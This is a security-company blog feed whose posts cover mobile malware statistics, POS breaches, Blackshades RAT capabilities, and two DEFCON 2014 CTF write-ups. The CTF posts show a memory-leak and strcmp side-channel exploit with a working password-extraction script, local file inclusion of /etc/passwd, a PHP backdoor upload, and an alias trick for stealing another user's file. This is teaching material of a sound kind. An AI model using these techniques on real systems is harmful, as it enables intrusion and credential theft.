throwninitMetrics(context);}voidinitMetrics(TopologyContextcontext){_countMetric=newCountMetric();_wordCountMetric=newMultiCountMetric();_wordLengthMeanMetric=newReducedMetric(newMeanReducer());context.registerMetric("execute_count",_countMetric,5);context.registerMetric("word_count",_wordCountMetric,60);context.registerMetric("word_length",_wordLengthMeanMetric,60);}@Overridepublicvoidexecute(Tupletuple){_collector.emit(tuple,newValues(tuple.getString(0)+"!!!"));_collector.ack(tuple);updateMetrics(tuple.getString(0));}voidupdateMetrics(Stringword){_countMetric.incr();_wordCountMetric.scope(word).incr();_wordLengthMeanMetric.update(word.length());}@OverridepublicvoiddeclareOutputFields(OutputFieldsDeclarerdeclarer){declarer.declare(newFields("word"));}}publicstaticvoidmain(String[]args)throwsException{TopologyBuilderbuilder=newTopologyBuilder();builder.setSpout("word",newTestWordSpout(),10);builder.setBolt("exclaim1",newExclamationBolt(),3).shuffleGrouping("word");builder.setBolt("exclaim2",newExclamationBolt(),2).shuffleGrouping("exclaim1");Configconf=newConfig();conf.setDebug(true);// This will simply log all Metrics received into $STORM_HOME/logs/metrics.log on one or more worker nodes.conf.registerMetricsConsumer(LoggingMetricsConsumer.class,2);if(args!=null&&args.length>0){conf.setNumWorkers(3);StormSubmitter.submitTopology(args[0],conf,builder.createTopology());}else{LocalClustercluster=newLocalCluster();cluster.submitTopology("test",conf,builder.createTopology());Utils.sleep(5*60*1000L);cluster.killTopology("test");cluster.shutdown();}}}

Android Is Still the King of Mobile Malware

$
0
0

According to F-Secure’s “Q1 2014 Mobile Threat Report”, the Android operating system was the main target of 99% of new mobile malware in Q1 2014. The report states that between January 1 and March 31, F-Secure discovered 275 new malware threat families for Android, compared to just one for iOS and one for Symbian. In the same report from Q1 2013, F-Secure identified 149 malware threat families with 91% of them targeting Android. Not only are malware threats proliferating, but the amount of malware specifically targeting Android devices is also increasing.

It’s true that Android malware is becoming more advanced and harder to mitigate. But all the same, the numbers tell a bleak story for Android users. Why are there so many more malware threat families for Android than for iOS? The advantage iOS has over Android in terms of malware protection is Apple’s App store, where all applications are fully vetted and tested before public release. This system has had a significant impact on preventing malware infections for iOS users. Since a large number of Android apps come from third-party sources, it’s more difficult for Google to monitor and control all of the Android apps being downloaded by consumers. As long as Android continues to allow users to download apps from third parties where “criminal developers” can distribute their applications, we’re likely to continue to see an increase in the number of Android malware threats. It will be interesting to see what F-Secure’s Q2 report brings.

Verizon's Data Breach Investigations Report: POS Intrusion Discovery

$
0
0

Verizon recently released its 2014 Data Breach Investigations Report. I could spend all day analyzing this, but I’ll touch on just one issue that’s been on many of our minds recently: Point-of-Sale (POS) intrusion.

Aside from Verizon’s assertion that the number of POS intrusions is actually declining (contrary to popular perception), I was most intrigued by the following statement: “Regardless of how large the victim organization was or which methods were used to steal payment card information, there is another commonality shared in 99% of the cases: someone else told the victim they had suffered a breach.”

What does that say for the wide array of network defense software currently deployed around the globe? An organization’s security posture is clearly flawed if the vast majority of compromises are discovered by outside parties (the report stated that law enforcement was the leading source of discovery for POS intrusions). It is especially troubling that even large organizations don’t spot intrusions, because they likely have the resources to purchase the best security tools available. Either companies aren’t prioritizing security, or the available tools are failing them.

The bottom line is that with all the network security tools out there, no one has shown much success at thwarting POS attacks in real time. If we assume the POS targets were PCI compliant, then they must have had, at a minimum, 12 security requirements from 6 control objectives (per the PCI Data Security Standard: Requirements and Security Assessment Procedures Version 3.0).

Despite these security measures being critical first lines of defense, in many situations they are not enough to thwart the most aggressive threats. Attackers were still able to enter the networks and extract sensitive consumer information. It seems likely that network defenders will continue to be unaware of nefarious acts taking place within their own networks until more intelligent network security solutions become the standard. Detection, analysis, and remediation need to happen in real time, rather than continuing to be a post-mortem affair.

DEFCON Capture the Flag Qualification Challenge #1

$
0
0

I constantly challenge myself to gain deeper knowledge in reverse engineering, vulnerability discovery, and exploit mitigations. By day, I channel this knowledge and passion into my job as a security researcher at Endgame. By night, I use these skills as a Capture the Flag code warrior. I partook in the DEFCON CTF qualification round this weekend to help sharpen these skills and keep up with the rapid changes in reverse engineering technology. DEFCON CTF qualifications are a fun, and sometimes frustrating, way to cultivate my skillset by solving challenges alongside my team, Samurai.

CTF Background

For those of you who aren’t familiar with a computer security CTF game, Wikipedia provides a simple explanation. The qualification round for the DEFCON CTF is run jeopardy style while the actual game is an attack/defense model. Qualifications ran all weekend for 48 hours with no breaks. Since 2013 the contest has been run by volunteers belonging to a hacker club called the Legitimate Business Syndicate, which is partly comprised of former Samurai members. They did a fantastic job with qualifications this year and ran a smooth game with almost no downtime, solid technical challenges, round the clock support and the obligatory good-natured heckling. As a fun exercise, let’s walk through an interesting problem from the game. All of the problems from the CTF game can be found here.

Problem Introduction

The first challenge was written by someone we’ll call Mr. G and was worth 2 points. Upon opening the challenge you are presented with the following text:

http://services.2014.shallweplayaga.me/shitsco_c8b1aa31679e945ee64bde1bdb19d035 is running at:shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me:31337Capturetheflag.

Downloading the shitsco_c8b1aa31679e945ee64bde1bdb19d035 file and running the “file” command reveals:

user@ubuntu:~$fileshitscoshitsco:ELF32-bitLSBexecutable,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),forGNU/Linux2.6.24,BuildID[sha1]=0x8657c9bdf925b4864b09ce277be0f4d52dae33a6,stripped

This is an ELF file that we can assume will run on a Linux 32-bit OS. Symbols were stripped to make reverse engineering a bit more difficult. At least it is not statically linked. I generally like to run strings on a binary at this point to get a quick sense of what might be happening in the binary. Doing this shows several string APIs imported and text that looks to be indicative of a command prompt style interface. Let’s run the binary to confirm this:

user@ubuntu:~$./shitscoFailedtoopenpasswordfile:Nosuchfileordirectory

Ok, the program did not do what I expected. We will need to add a user shitsco and create a file in his home directory called password. I determined this by running:

shitsco@ubuntu:~$sudostrace./shitscoopen("/home/shitsco/password",O_RDONLY)=-1ENOENT(Nosuchfileordirectory)

We can see that the file /home/shitsco/password was opened for reading and that this failed (ENOENT) because the file did not exist. You should create this file without a new line on the end or you might have trouble later on. I discovered this through trial and error. After creating the file we get better results:

shitsco@ubuntu:~$echonasdf>/home/shitsco/passwordshitsco@ubuntu:~$./shitscooooooooo8ooooo88o8888888oooooooooo888oooooooooo8oooooooooooooo888oooooo888888888888888ooooooo888888888888888888888888888888888888888o88oooo888o888oo888oo888o888o88oooooo8888ooo88888ooo88WelcometoShitscoInternetOperatingSystem(IOS)Foracommandlist,enter?$?==========AvailableCommands==========|enable||ping||tracert||?||shell||set||show||credits||quit|======================================Type?followedbyacommandformoredetailedinformation$

This looks like fun. We have what looks to be a router prompt. Typically, the goal with these binary exploitation problems is to identify somewhere that user input causes the program to crash and then devise a way to make that input take control over the program and reveal a file called flag residing on the remote machine. At this point, I have two choices. I can play around with the input to see if I can get it to crash or I can dive into the reverse engineering. I opted to play around with the input and the first thing that caught my attention was the shell command!

WelcometoShitscoInternetOperatingSystem(IOS)Foracommandlist,enter?$shellbash-3.2$

No way, it couldn’t be that easy. Waiting 5 seconds produces:

Yeah,right.

Ok, let the taunting begin. We can ignore the shell command. Thanks for the laugh Mr. G. By playing with the command line interface, I found the command input length was limited to 80 characters with anything coming after 80 characters applying to the next command. The set and show commands looked interesting, but even adding 1000 variables of different lengths failed to produce any interesting behavior. Typically, I am looking for a way to crash the program at this point.

What really looked like the solution came from the enable command:

$enablePleaseenterapassword:asdfAuthenticationSuccessful#?==========AvailableCommands==========|enable||ping||tracert||?||flag||shell||set||show||credits||quit||disable|======================================Type?followedbyacommandformoredetailedinformation#flagTheflagis:foobarbaz

The password for the enable prompt comes from the password file we created earlier. I also created a file in /home/shitsco/ called flag with the contents foobarbaz; which is now happily displayed on my console. The help (? command) after we enter “enabled mode” has two extra commands: disable and flag. So, if I can get the enable password on the remote machine, then I can simply run the flag command and score points on the problem. Ok, we have a plan, but how to crack that password?

The “Enable” Password

To recover this password, the first option that comes to mind is brute force. This is usually an option of last resort in CTF competitions. Just think about what could happen to this poor service if 1000 people decided to brute force the challenge. Having an inaccessible service spoils the fun for others playing. It’s time to dive a bit deeper and see if there is anything else we could try.

I tried long passwords, passwords with format strings such as %s, empty passwords, and passwords with binary data. None of these produced any results. However, a password length of 5 caused a strange behavior:

$enablePleaseenterapassword:AAAAANope.Thepasswordisn'tAAAAAr▒@▒r▒▒ο`M_▒`▒▒▒t

Ok, that looks like we’re getting extra memory back. If we look at it as hex we see:

shitsco@ubuntu:~$echo-eenable\\nAAAAA\\n|./shitsco|xxd0000220:20205468652070617373776f72642069Thepasswordi0000230:736e2774204141414141f07cb740f47csn'tAAAAA.|.@.|0000240:b79290c1bf60c20408088d69b760c204.....`.....i.`..0000250:08a0297fb7010a24200a3a20496e7661..)....$.:Inva0000260:6c696420636f6d6d616e640a2420lidcommand.$

The bit that starts 0xf0 0x7c is the start of the memory disclosure. Looking a little further, we see 0x60 0xc2 0x04 0x08. This looks like it could be a little endian encoded pointer for 0x0804c260. This is pretty cool and all, but where is the password?

I tried sending in all possible password lengths and it was always leaking the same amount of data. But the leak only worked if the password is more than 4 characters. It’s time to turn to IDA Pro and focus in on the function for the enable command.

This is the disassembly for the function responsible for handling the enable command. It is easy to find with string cross references:

.text:08049230enableprocnear;DATAXREF:.data:0804C270o.text:08049230.text:08049230dest=dwordptr-4Ch.text:08049230src=dwordptr-48h.text:08049230n=dwordptr-44h.text:08049230term=byteptr-40h.text:08049230s2=byteptr-34h.text:08049230var_14=dwordptr-14h.text:08049230cookie=dwordptr-10h.text:08049230arg_0=dwordptr4.text:08049230.text:08049230pushesi.text:08049231pushebx.text:08049232subesp,44h.text:08049235movesi,[esp+4Ch+arg_0].text:08049239moveax,largegs:14h.text:0804923Fmov[esp+4Ch+cookie],eax.text:08049243xoreax,eax.text:08049245moveax,[esi].text:08049247testeax,eax.text:08049249jzloc_80492D8.text:0804924Fleaebx,[esp+4Ch+s2].text:08049253mov[esp+4Ch+n],20h;n.text:0804925Bmov[esp+4Ch+src],eax;src.text:0804925Fmov[esp+4Ch+dest],ebx;dest.text:08049262call_strncpy.text:08049267.text:08049267loc_8049267:;CODEXREF:enable+EDj.text:08049267mov[esp+4Ch+src],ebx;s2.text:0804926Bmov[esp+4Ch+dest],offsetpassword_mem;s1.text:08049272call_strcmp.text:08049277mov[esp+4Ch+var_14],eax.text:0804927Bmoveax,[esp+4Ch+var_14].text:0804927Ftesteax,eax.text:08049281jzshortloc_80492B8.text:08049283mov[esp+4Ch+n],ebx.text:08049287mov[esp+4Ch+src],offsetaNope_ThePasswo;"Nope.  The password isn't %s\n".text:0804928Fmov[esp+4Ch+dest],1.text:08049296call___printf_chk.text:0804929B.text:0804929Bloc_804929B:;CODEXREF:enable+A5j.text:0804929Bmov[esp+4Ch+dest],esi.text:0804929Ecallsub_8049090.text:080492A3moveax,[esp+4Ch+cookie].text:080492A7xoreax,largegs:14h.text:080492AEjnzshortloc_8049322.text:080492B0addesp,44h.text:080492B3popebx.text:080492B4popesi.text:080492B5retn.text:080492B5;---------------------------------------------------------------------------.text:080492B6align4.text:080492B8.text:080492B8loc_80492B8:;CODEXREF:enable+51j.text:080492B8mov[esp+4Ch+dest],offsetaAuthentication;"Authentication Successful".text:080492BFmovds:admin_privs,1.text:080492C9movds:prompt,23h.text:080492D0call_puts.text:080492D5jmpshortloc_804929B.text:080492D5;---------------------------------------------------------------------------.text:080492D7align4.text:080492D8.text:080492D8loc_80492D8:;CODEXREF:enable+19j.text:080492D8mov[esp+4Ch+src],offsetaPleaseEnterAPa;"Please enter a password: ".text:080492E0leaebx,[esp+4Ch+s2].text:080492E4mov[esp+4Ch+dest],1.text:080492EBcall___printf_chk.text:080492F0moveax,ds:stdout.text:080492F5mov[esp+4Ch+dest],eax;stream.text:080492F8call_fflush.text:080492FDmovdwordptr[esp+4Ch+term],0Ah;term.text:08049305mov[esp+4Ch+n],20h;a3.text:0804930Dmov[esp+4Ch+src],ebx;a2.text:08049311mov[esp+4Ch+dest],0;fd.text:08049318callread_n_until.text:0804931Djmploc_8049267.text:08049322;---------------------------------------------------------------------------.text:08049322.text:08049322loc_8049322:;CODEXREF:enable+7Ej.text:08049322call___stack_chk_fail.text:08049322enableendp

Here is the C decompiled version of the function that is a bit clearer:

int__cdeclenable(constchar**a1){constchar*v1;// ebx@2chars2[32];// [sp+18h] [bp-34h]@2intv4;// [sp+38h] [bp-14h]@3intcookie[4];// [sp+3Ch] [bp-10h]@1cookie[0]=*MK_FP(__GS__,20);if(*a1){v1=s2;strncpy(s2,*a1,32u);}else{v1=s2;__printf_chk(1,"Please enter a password: ");fflush(stdout);read_n_until(0,(int)s2,32,10);}v4=strcmp((constchar*)password_mem,v1);if(v4){__printf_chk(1,"Nope.  The password isn't %s\n",v1);}else{admin_privs=1;prompt='#';puts("Authentication Successful");}sub_8049090((void**)a1);return*MK_FP(__GS__,20)^cookie[0];}

I’ve labeled a few things here like the local variables and the recv_n_until function. Notice that s2 or [esp+4Ch+src] is the destination buffer for the password we enter. It also looks possible to run enable < password > and not get prompted for the password. This results in a strncpy and the other prompting path read the password with a call to recv_n_until. Here is the interesting thing: When I tried the strncpy code path, I did not get the leak behavior:

$enablePleaseenterapassword:AAAAANope.Thepasswordisn'tAAAAA`x@dx▒▒▒`▒d▒`▒▒▒z$enableAAAAANope.Thepasswordisn'tAAAAA$

So, what is the difference? Let’s have a quick look at the strncpy man page, namely the bit that says “If the length of src is less than n, strncpy() writes additional null bytes to dest to ensure that a total of n bytes are written.” On the prompting code path, our string is not being null terminated but if we enter the password with the enable command it is null terminated. We can also see that the s2 variable on the stack is never initialized to 0. There is no memset call.

Still we don’t have the password. It doesn’t exist in the leaked data. Leaks are very useful in exploitation as a defeat to ASLR. We might have enough information here to recover base addresses of the stack or libc. However, the path we are on to get the flag does not involve taking advantage of memory corruption. Is there anything in this leak that could give us something useful?

To answer this question let’s look at the stack layout and what is actually getting printed back to us:

.text:08049230dest=dwordptr-4Ch.text:08049230src=dwordptr-48h.text:08049230n=dwordptr-44h.text:08049230term=byteptr-40h.text:08049230s2=byteptr-34h.text:08049230var_14=dwordptr-14h.text:08049230cookie=dwordptr-10h.text:08049230arg_0=dwordptr4

Therefore, if we are copying into s2 and we only leak data after the 4th character, we can assume that by default in the uninitialized stack there is a null at s2[3]. Overwriting this with user data causes our string to not terminate until we run into a null later on up the stack. What is var_14?

v4=strcmp((constchar*)password_mem,v1);

It turns out that var_14 (or v4) is the return from strcmp. Hummm. Here is what the main page has to say about that “The strcmp() and strncmp() functions return an integer less than, equal to, or greater than zero if s1 (or the first n bytes thereof) is found, respectively, to be less than, to match, or be greater than s2.” What this means is that we can tell if our input string is less than or greater than the password on the remote machine. Let’s try it locally first. Our password locally is “asdf”. Let’s see if we can divine the first character using this method. The var_14 variable should be the 33rd character we get back:

shitsco@ubuntu:~$python-c"import sys;sys.stdout.write('enable\n' + ''*80 + '\n')"|./shitsco|xxd0000210:2070617373776f72643a204e6f70652epassword:Nope.0000220:20205468652070617373776f72642069Thepasswordi0000230:736e2774202020202020202020202020sn't0000240:202020202020202020202020202020200000250:2020202020010a24200a202020202020..$.

I picked the space character for our password because on the ascii table space (0x20) is the lowest value printable character. We can see that the bit in bold here was 0x0100 as var_14. The null after the 0x1 is implied. Now, what happens if we set this to ‘a’ + 79 spaces?

shitsco@ubuntu:~$python-c"import sys;sys.stdout.write('enable\na' + ''*79 + '\n')"|./shitsco|xxd0000220:20205468652070617373776f72642069Thepasswordi0000230:736e2774206120202020202020202020sn'ta0000240:202020202020202020202020202020200000250:2020202020010a24200a202020202020..$.0000260:20202020202020202020202020202020

Remember, that ‘a’ was actually the first character of our password locally and we still got a 0x1 back. How about ‘b’?

shitsco@ubuntu:~$python-c"import sys;sys.stdout.write('enable\nb' + ''*79 + '\n')"|./shitsco|xxd0000220:20205468652070617373776f72642069Thepasswordi0000230:736e2774206220202020202020202020sn'tb0000240:202020202020202020202020202020200000250:2020202020ffffffff0a24200a202020.....$.0000260:20202020202020202020202020202020

Bingo. Here we have a value of 0xffffffff for var_14. Therefore, we know that the string we sent in is numerically higher than the actual password. The last character we tried, ‘a’, was still giving us back 0x01. When we see the value of var_14 change to -1 we know that the correct character was not the most recent attempt but the one prior to it. We can send all characters sequentially until we find the password.

Automation

The password used on the remote server is probably short enough that we could disclose it by hand. However, as a general rule in life, if I have to do something more than a few times I almost always save time by writing a quick python script to automate. Since we are going to be running this on a remote target I’ve set the server to run over a TCP port with some fancy piping over a fifo pipe.

shitsco@ubuntu:~$mkfifopipeshitsco@ubuntu:~$nc-l31337<pipe|./shitsco>pipe

Here is a python script that will discover the password used. I’ve changed the password file on my local system to the one that was used during the game:

importsocketimportstringimportsyss=socket.socket()s.connect(("192.168.1.151",31337))s.recv(1024)deftry_pass(passwd):s.send("enable\n")s.recv(1024)s.send(passwd+"\n")ret=s.recv(1024)ifret.find("Authentication Successful")!=-1:return"!"returnret[ret.find("$")-2]chars=[]forxinstring.printable:chars.append(x)chars.sort()known=""while1:prev=chars[0]forxinchars:i=try_pass(known+x+""*(30-len(known)))iford(i)==0xff:known+=prevbreakprev=xi=try_pass(known[:-1]+x+"\x00")ifi=='!':print"Enable password is: %s"%(known[:-1]+x)sys.exit()

Running the script produces the output:

$pythonshitsco.pyEnablepasswordis:bruT3m3hard3rb4by

Excellent, let’s connect to the service with netcat and retrieve the flag:

$ncshitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me31337oooooooo8ooooo88o8888888oooooooooo888oooooooooo8oooooooooooooo888oooooo888888888888888ooooooo888888888888888888888888888888888888888o88oooo888o888oo888oo888o888o88oooooo8888ooo88888ooo88WelcometoShitscoInternetOperatingSystem(IOS)Foracommandlist,enter?$enablebruT3m3hard3rb4byAuthenticationSuccessful#flagTheflagis:14424ff8673ad039b32cfd756989be12

All that’s left to do is submit the flag and score points!

I’ll be posting another challenge and solution from the CTF soon, so if you found this one interesting, be sure to check back for more.

Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

$
0
0

Much of the discussion around cyber security of critical infrastructure focuses on the debilitating impact of a cyber attack on a country’s energy, economic, and transportation backbone. But Russia’s recent actions suggest an elevation of telecommunications as the most critical of all infrastructures—and the one it deems most worthy of protecting, not only because of the risks it may face, but also because of its potential as a mechanism for advancing national interests.

In March 2014, cyber attacks between Russia and Ukraine began when unknown hackers attacked Russian central bank and foreign ministry websites, and Ukrainian government websites were hit by an onslaught of 42 attacks during the Crimean vote for secession. Amid this back-and-forth volley of cyber attacks, Russia has quickly and quietly invested almost $25 million to provide Internet and telecom infrastructure in Crimea by deploying a fiber-optic submarine telecom link between the mainland and its newest territory. Rather than focusing on switching water, transportation, or electricity to Russian infrastructure, it has prioritized the establishment of telecommunications networks, turning this critical infrastructure into a tactic in and of itself.

By owning the telecom connections into Crimea, Russia ensures security for its communications there and eliminates Ukrainian disruptions. Russia’s telecom investments suggest that in the 21st century, national priorities in times of conflict have been reorganized around the assurance of secure telecommunications even before the assurance of traditional critical infrastructure security.

The threats to critical infrastructure are real and significant, but this prioritization of telecommunications as a tool of international relations suggests that we should pay attention not only to the cyber security risks to critical infrastructure, but also to how countries are using this very infrastructure as a tactic during times of conflict.

Blackshades: Why We Should Care About Old Malware

$
0
0

“Blackshades is so 2012” is the near response I received when I mentioned to a friend the recent FBI takedown of almost 100 Blackshades RAT dealers. This nonchalant, almost apathetic attitude towards older malware struck a nerve with me, since I’ve known network defenders and incident responders with the same sentiment. If the malware isn’t fresh, or if it’s perceived as old, they don’t want any part of it. While that attitude isn’t necessarily the norm, it does serve as a reminder that malware never truly dies–it just keeps on compromising. In fact, more than a half million computers in over 100 countries were reportedly recently infected by the Blackshades malware.

The FBI arrests are indicative of the omnipresence of malware even after it has been identified. In addition to the arrests, the FBI seized more than 1,900 domains used by Blackshades users to control their victims’ computers. Despite these seizures, countless systems from around the globe continue to attempt connections with their respective Blackshades Command and Control (CnC) domains. And there’s really no telling how many people have a copy of the RAT. Blackshades has been around for a while, and with a sales price of $40, it’s also quite affordable–not to mention the fact that the source code was leaked in 2010. It seems likely that there are a number of Blackshades RAT controllers still at large.

What does Blackshades actually do? Just about anything the controller wants. Lately, the news around Blackshades has focused on its use as “Creepware,” in which a victim’s webcam is turned on remotely. But the RAT can do much more than that. For example, a couple of years ago the Blackshades Stealth version advertised the following capabilities:

  • General Computer Information (local IP, username, operating system (OS), uptime, webcam, etc.)
  • Screen, Webcam, and Voice Capture
  • Keylogger, File Manager, Processes, Password Recovery, Ping
  • Download and Execute, Shell, Maintenance (reconnect, close, restart, uninstall)
  • Open Windows (shows what applications are open)
  • Mac Compatible Client

There were other versions, too. The Blackshades Radar, for example, advertised the ability to set keywords to listen for in either the window title or written text. This would then trigger a key-logger to start logging keystrokes for a controller-specified amount of time, and the data collected would be sent back to the controller via email. This capability helped attackers pinpoint and exfiltrate a desired set of data, without a lot of excess key-logged chaff. Blackshades Recover advertised the ability to collect passwords, CD keys, and product keys for hundreds of popular software applications. And Blackshades Fusion advertised its ability to incorporate many of the previously described functions.

With such an impressive resume of capabilities, it’s no wonder the Syrian government used Blackshades, along with RAT-siblings Dark Comet and Gh0stRAT, against Syrian activists in early 2012. And even though that campaign may also be “so 2012” to some, the well-reported CnC domain used (alosh66(dot)servecounterstrike(dot)com) is still very much alive and kicking. In fact, according to various sources, there have been over 21,000 connection attempts for the domain this year from several countries around the globe, including from the U.S., with the majority coming from a Syrian Internet Service Provider. If this number for alosh66(dot)servecounterstrike(dot)com is accurate, and if that number holds true for the 1,900 domains ceased by the FBI, that would equate to potentially 39,879,000 connection attempts to Blackshades CnC domains since January 1, 2014. Fortunately, the domain has essentially been terminated, as it has been resolving to 0.0.0.0 since 2012, but it’s possible that the controller could have reconfigured those systems to communicate via a different CnC domain, meaning all of the aforementioned systems could be actively infected.

While the exact number of infected systems cannot be determined, the recent arrests illustrate the longevity of malware. The cybercrime landscape not only includes new and emerging threats, but also requires constant assessment of older malware. Regardless of how many systems are infected by the Blackshades RAT, the FBI arrests truly highlight the fact that the war on cybercrime is in full swing.

DEFCON Capture the Flag Qualification Challenge #2

$
0
0

This is my second post in a series on DEFCON 22 CTF Qualifications. Last time I examined a problem called shitsco and gave a short overview of CTF. This week, I’d like to walk you through another DEFCON Qualification problem: “nonameyet” from HJ. This problem was worth 3 points and was opened late in the game. It was solved by 10 teams but, sadly, my team, Samurai, was not one of them. I managed to land this one about an hour after the game ended. It’s a common theme among CTF players that they don’t stop after the game ends. There’s always some measure of personal pride on the line when it comes to solving these problems, regardless of points earned.

The problem description for nonameyet is:

Iclaimnoresponsibilityforthethingspostedhere.nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me:80

There is no download link provided and the service is running on port 80. We are to assume that this is a web challenge. Browsing to the web application I see that it allows users to upload photos to a /photos directory, hence the disclaimer in the problem description. Whenever a file upload capability is involved in a CTF web challenge, you can bet that it will be a source of a vulnerability. I have yet to see a web application problem in a CTF that provided a counter example.

One of the URLs for the web application looked like this:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=xxxxxxx

When I see page=xxxxxxx referencing a filename there is potential for a local file include vulnerability. Indeed, if I visit:

http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php?page=/etc/passwd

I am able to view the shadowed password file on the server. So far, so good. Unfortunately, asking for the flag file directly yields an error. Of course, a 3 point problem would never be so easy in this CTF. Let’s turn our attention back to the file upload.

The page with the HTML for the upload form is upfile.html. This is loaded with a “?page=upfile.html” on the end of the URL. Examining the HTML source code on this file shows that our form data is submitted to /cgi-bin/nonameyet.cgi. We can recover this CGI program with a simple wget command:

$wgethttp://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me/index.php\?page\=cgi-bin/nonameyet.cgi$filenonameyet.cginonameyet.cgi:ELF32-bitLSBexecutable,Intel80386,version1(SYSV),dynamicallylinked(usessharedlibs),stripped

You can find a copy of nonameyet.cgi here

More interestingly, it is also possible to use the upload form to upload anything at all. This just begs to have a PHP backdoor uploaded to the system. We put a simple PHP file manager on http://nonameyet_27d88d682935932a8b3618ad3c2772ac.2014.shallweplayaga.me... and used that to look around the directory structure and permissions placed on the files. Specifically, we could see that the /home/nonameyet/flag file was owned by nonameyet:nonameyet. I need to gain execution as this user to retrieve the flag. The web server executing the PHP scripts (including our backdoor) was running as the web server user.

It is important to note that getting a shell on a box provides an opportunity for many new attack vectors. For this problem, it was actually solved by other teams editing the file /home/nonameyet/.bash_aliases to include an alias that would copy the /home/nonameyet/flag file to /tmp with world readable permissions. The next time anyone popped a shell on this box and ran “ls” they would hand the flag over to another team. This was a very clever and devious thing to do—and in some sense, this is what CTF is all about.

I believe that having this file editable was an oversight on the part of the organizers. This file should not have been writeable. It was a great advantage for the teams that realized this mistake because they were free to look at other problems while waiting for someone else to come along and solve it the “legitimate” way. Furthermore, anyone that thought to look in /tmp before the flag was cleaned up could score points too. Lesson learned: Always poke around more and possibly set up some sort of monitoring for these kinds of issues. I wish I had thought of this first!

Binary Analysis

I went straight for the binary in the problem. The binary was not marked SUID so there must be some webserver magic launching the CGI program as the nonameyet user. Indeed, HJ confirmed that he was using a modified version of suexec after the game. I have already run a file command to see that the CGI program is an ELF 32-bit program. My usual next step is to run strings.

$stringsnonameyet.cgi

I see imports for C functions related to string parsing and file operations including dangerous APIs like strcpy() and sprintf(). I see a list of the errors the CGI program will return and input variables like photo, time, and date. There are some chunks of HTML and HTTP headers too. So far, it is a fairly typical CGI program. If you try to run it you will get an error 900 printed out to you with HTML tags. A quick strace shows that it is looking for the photos directory. Create this directory and you will move on to the program prompting you for input. Just enter ^D to signal an end of file and you will receive an error 902. Back to the strings. One string that really caught my eye was the “cgilib” string. This is indicative of a cgilib library. There were other strings that pointed to a library as well, such as the “/tmp/cgilibXXXXXX” string.

Cgilib is a “library [that] provides a simple and lightweight interface to the Common Gateway Interface (CGI) for C and C++ programs. Its purpose is to provide an easy to use interface to CGI for fast CGI programs written in the C or C++ programming language.” It is also an open source project. We can see from the output of the file command that the nonameyet.cgi program is dynamically linked, so let’s take a quick peek with ldd to see if cgilib is statically compiled into the binary or dynamically loaded at runtime from our system library.

$lddnonameyet.cgilinux-gate.so.1=>(0xb77dd000)libc.so.6=>/lib/i386-linux-gnu/libc.so.6(0xb761e000)/lib/ld-linux.so.2(0xb77de000)

We do not see cgilib on the list returned form ldd, so the cgilib library is statically linked. That is to say that if the cgilib binary is used in this program, it must have been compiled into the binary, which means that I could have source code for a good chunk of this problem. That would be a great aid in the reverse engineering process. One way to match up statically compiled libraries into CTF binaries is to use the IDA Pro FLAIR tool to generate a FLIRT signature that can be applied to the binary.

Which version of the library should I grab? The reverse lookup on the IP address used for this problem pointed to an Amazon EC2 server. I created an EC2 instance running the latest version of Ubuntu and applied all updates. It is important to mirror the game box as closely as possible. It is even better if we can run from the same ISP. I installed cgilib with this command:

$sudoapt-getinstallcgilib

This added a file in /usr/lib/cgilib.a. I pulled this file back to my analysis machine with FLAIR installed and ran:

C:\>pelf-alibcgi.aC:\>sigmake-n"libcgi"libcgi.patlibcgi.sig

The first command “pelf” will parse the library file and generate patterns for all exported symbols. The output of the command is put into the libcgi.pat file. The next “sigmake” command will read from the libcgi.pat file and create a binary representation that is output in the libcgi.sig file. This sig file can then be copied into the IDA Pro /sig directory and applied to a live database. All of this completely failed. No symbols were applied. I have not identified why. Bummer.

Thankfully, the library is very simple and almost all of the functions contain unique strings. We can download the source code for libcgi, find a function we are interested in, find a string used in that function, then find the same string in IDA Pro. Once we find the string in IDA we can press ‘x’ while the cursor is positioned on that string to find cross-references. If we follow the (hopefully) single cross-reference that exists, we can then name the function referencing that string as it is named in the source code for cgilib. It is a bit slower than FLIRT signatures but we will be able to flag a significant portion of the program as “uninteresting” right away. For example, if we look at the cgiReadFile function in the cgilib source code cgilib-0.7/cgi.c:

char*cgiReadFile(FILE*stream,char*boundary){char*crlfboundary,*buf;size_tboundarylen;intc;unsignedintpivot;char*cp;chartemplate[]="/tmp/cgilibXXXXXX";FILE*tmpfile;intfd;

We can then find the /tmp/cgilibXXXXXX string in IDA Pro with a “search sequence of bytes”.

This will fail! As it turns out, there is a compiler optimization used on this function causing the string to be loaded as an immediate value on the stack. This is also sometimes used in programs that want to make string analysis more difficult on the reverse engineer. Indeed, if we go back and look at the string output our first clue is there:

~$stringsnonameyet.cgi/tmp/cgilibXXXXXf

They are broken up into groups of 4. This is because they are referenced as immediate DWORD values being moved into memory. Let’s repeat the search using a smaller string. If we search for “/tmp” we see exactly one spot in the binary where this appears. Here is how IDA shows the string data being loaded onto the stack:

We can now go to the top of this function and name it (‘n’ key) “cgiReadFile.” If you go through the rest of cgi.c you will end up with the following functions named:

The function named cgi_print (my name, not the cgilib name) is frequently called to output error messages that would be useful for debugging purposes. A quick look at this function reveals that if we set dword_804f0dc (normally 0 in the .bss) to something greater than arg0 (I assume this is a logging level?) we can get debugging output from the binary. In gdb the command to do this is:

